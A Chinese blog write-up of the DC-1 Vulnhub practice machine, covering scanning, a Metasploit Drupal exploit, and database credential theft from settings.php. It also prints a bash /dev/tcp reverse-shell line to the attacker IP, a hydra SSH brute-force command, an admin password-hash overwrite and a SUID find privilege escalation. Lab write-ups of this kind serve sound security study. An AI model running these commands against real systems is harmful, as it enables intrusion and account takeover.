DC1靶机练习

最新推荐文章于 2022-08-30 21:42:42 发布
最新推荐文章于 2022-08-30 21:42:42 发布
阅读量205 收藏
点赞数
分类专栏: # DC靶机渗透 文章标签: 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/116025224
版权

文章目录


实验环境:DC-1靶机、kali攻击机

靶机:
链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw

1、查看靶机的mac地址

在这里插入图片描述
此步也可省略,毕竟在真实环境不知道MAC地址。

2、扫描该网段

在这里插入图片描述
发现靶机的ip地址为192.168.246.140

接下来扫描开放端口的信息
在这里插入图片描述
发现开放了22、80、111端口

22端口可以尝试进行爆破

尝试进行访问80端口,发现可以打开网页
在这里插入图片描述

发现使用的是Drupal网站管理系统。

3、对网站目录进行扫描

可以使用kali自带工具dirb
在这里插入图片描述
扫描过程太慢
也可以使用dirbuster(需要进行安装)

进入robots.txt文件
在这里插入图片描述
发现关于更新的文本描述,尝试去访问
在这里插入图片描述
发现这个网站的版本是7.x

4、寻找可以利用的漏洞

可以通过百度去寻找相关的CVE漏洞

也可以使用msf获取会话
首先利用search drupal查询漏洞利用模块
在这里插入图片描述
利用2018年这个漏洞利用模块,设置攻击载荷与相关选项
在这里插入图片描述
获取到目标主机会话,查询当前路径等
在这里插入图片描述
发现了flag1.txt,查看内容
在这里插入图片描述
该内容表示任何一个CMS都需要一个配置文件,你也不例外

5、这个时候就需要从相关的配置文件入手。

发现网站目录中有一个web.config,查看发现作用不大。

从而想到每一个web网站一般都有数据库配置文件,配置文件中存放着明文用户与密码等,所以可以尝试去寻找数据库的配置文件。

查看sites这个目录可以寻找到数据库配置文件。
在这里插入图片描述
查看settings.php文件
发现flag2
在这里插入图片描述
这个flag表示暴力破解和字典攻击不是获取成功的唯一方式,但是也可以去进行尝试

6、获取到了数据库相关信息,所以可以尝试登陆数据库

‘database’ => ‘drupaldb’,
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,
‘host’ => ‘localhost’,
‘port’ => ‘’,
‘driver’ => ‘mysql’,
‘prefix’ => ‘’

shell命令可以获取网站webshell,查看id发现不是管理员权限
在这里插入图片描述
这个时候需要查询有没有开放3306端口
在这里插入图片描述
开放了3306端口,但是发现需要本机进行登录

尝试进行mysql登录
mysql -udbuser -pR0ck3t
连接失败

7、尝试反弹shell

本地监听2333端口

nc -lvvp 2333

bash -i >& /dev/tcp/192.168.246.130/2333 0>&1

结果反弹失败

利用这条命令进入交互式shell

python -c ‘import pty;pty.spawn("/bin/bash")’

在这里插入图片描述

成功进入交互式shell

现在尝试能不能进行shell反弹
在这里插入图片描述
发现成功了,这是因为之前是通过python调用的bash

登录mysql数据库,但是发现在反弹的shell中登录不了,但是在交互式shell中却能登录
在这里插入图片描述
在这里插入图片描述

8、操作数据库,查看表

发现存在用户的表是users
在这里插入图片描述
查看表格内容
在这里插入图片描述
发现admin用户,但是其密码经过了加密,要想破解密码比较困难,但是可以通过伪造一个密码经过加密后对数据的表进行修改即可

使用drupal时自带脚本重新生成密码
脚本在www目录
命令:php scripts/password-hash.sh admin
在这里插入图片描述
进入数据库进行更改
重新登录mysql数据库
update users set pass=‘ S S SDH1FP9a2OmNsHCYRQJeSICFQqZUcfUmecNf1cB/ILxbZY1D87L/2’ where uid=1;
在这里插入图片描述
进入网页使用用户名admin,密码admin进行登录
发现了flag3
在这里插入图片描述
这个flag3将线索指引到etc/passwd

9、查看etc/passwd,发现flag4

在这里插入图片描述
flag4用户可以登录,所以尝试ssh爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.246.140 ssh -vV
-f -o hydra.ssh

爆破成功
在这里插入图片描述

10、使用用户名flag4,密码为orange进行登录
ssh flag4@192.168.246.140
在这里插入图片描述
登录成功
发现了flag4.txt
在这里插入图片描述
表示可以使用相同的方法在root目录下获取flag

进入/root目录发现没有权限访问
在这里插入图片描述

11、提权

查看是有有一些命令具有SUID标志
因为带有SUID的命令具有root权限,然后利用权限具有传递性

find / -perm -4000 2>/dev/null
在这里插入图片描述

发现find命令具有root权限
利用操作系统内核提权(这是提权最后尝试的方法)

mkdir lsy
find lsy -exec “whoami” ;
find lsy -exec “/bin/bash” ;
find lsy -exec “/bin/sh” ;

在这里插入图片描述
查看最终的flag
在这里插入图片描述

DiliLearngent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-1靶机实战和分析
weixin_48202759的博客
08-31 929
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
vulnhub靶机试验DC-1
aweiname2008的博客
02-08 352
Vulnhub靶机试验
vulnhub之DC1靶机
LainWith的博客
08-15 1220
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 721
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
DC1_map_airtrafficcontrol_
10-02
"DC1_map_airtrafficcontrol_" 这个标题暗示我们正在处理一个与空管相关的项目,该项目可能涉及计算特定的指标——Map值,并通过用户界面(UI)展示这些数据。Map在这里指的是监控扇区告警参数,它对于评估和优化...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
DC-3靶机学习笔记
浅时光-Trister
08-26 542
DC-3靶机学习笔记
找不到靶机的IP怎么办,教你几步就会了
热门推荐
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
浏览器连接不上owasp靶机的IP地址
aijhx的博客
07-09 3798
刚开始安装靶机的时候,网络选择的是NAT模式,发现主机浏览器始终无法打开靶机的IP地址,我的解决办法如下: 1.在虚拟机界面输入如下命令靶机的服务有没有起来,服务起来之后进入第二步 2.ifconfig 靶机的IP地址,打开cmd命令窗,看主机和靶机的网络能不能ping通,我就是这一步网络不能ping通,然后把靶机的网络改成桥接模式 然后在靶机界面输入命令 dhclient eth0 自动获取IP地址,再试一下网络能不能通,通了之后在浏览器打开靶机的IP地址。 3.如果以上两步做
DC1靶机
孤的博客
09-30 1094
目标探测 因为是在局域网内,所以使用内网扫描 目标已经确定,进行端口扫描 namp -sT -sC -p- -sV -T 3 -sT 全连接 -sC 使用默认的安全脚本 -p- 全端口 -sV 版本探测 -T 时间频率(太快的话,可能什么也扫不到) 根据扫描结果,我们以80端口位突破口 很明显,我们看到网站的cms,所以我们可以直接在网上搜索这个cms的漏洞利用方式 使用metaspl...
Vulnhub靶机检测不到IP地址
asstart的博客
12-07 6433
vulnhub靶机无法获取IP地址 0x00前言 小编从vulnhub官网下载靶机,准备做学习测试时,使用kali无法检测到靶机的IP,arp-scan、nmap存活主机探测、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 0x01排 确保kali与vulnhub靶机同处在一个网络环境。经过确认kali虚拟机和vulnhub靶机均同处在VM...
DC1-靶机
Au
07-31 9478
环境搭建 DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。 将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件) 配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 靶机开机后是一个登陆页面,无法得知ip 环境 kali:192.1...
靶机 Hacknos:1
m0_51811529的博客
08-30 471
靶机1
vulnhub靶机 DC1练习之find提权
qq_43232893的博客
10-14 472
vulnhub系列 DC1 靶机vulnhub系列 DC1 靶机开始 vulnhub系列 DC1 靶机 DC靶机的内网渗透,简介里说我们要找出5个flge就算通关了 开始 靶场启动后我们内网扫一波找出靶机的ip地址,这里我们用nmap扫。 端口扫描: 这里我们访问一下开放的80端口: 在百度搜索drupal存在远程代码执行漏洞 CVE-2018-7600远程代码执行漏洞复现 这里我们直接用msf进行复现: search CVE-2018-7600 搜索复现模块 use 模块路径 show optio
计算机三级PC专业技术.doc
最新发布
07-18
计算机
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值